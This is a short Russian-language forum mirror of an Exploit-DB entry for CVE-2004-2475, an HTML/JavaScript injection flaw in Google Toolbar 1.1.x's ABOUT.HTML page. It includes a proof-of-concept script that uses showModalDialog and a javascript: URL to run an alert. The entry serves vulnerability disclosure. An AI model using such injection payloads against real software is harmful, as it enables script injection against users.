- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24607
- Проверка EDB
-
- Пройдено
- Автор
- VIPERSV
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2004-2475
- Дата публикации
- 2004-09-17
Google Toolbar 1.1.x - About.HTML HTML Injection
Код:
source: https://www.securityfocus.com/bid/11210/info
Google Toolbar is reported prone to a HTML injection vulnerability. It is reported that the Google Toolbar 'ABOUT.HTML' page allows the injection of HTML and JavaScript code.
This vulnerability may allow an attacker to inject malicious HTML and script code into the about page of the vulnerable application.
<s c r i p t>
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</s c r i p t>- Источник
- www.exploit-db.com
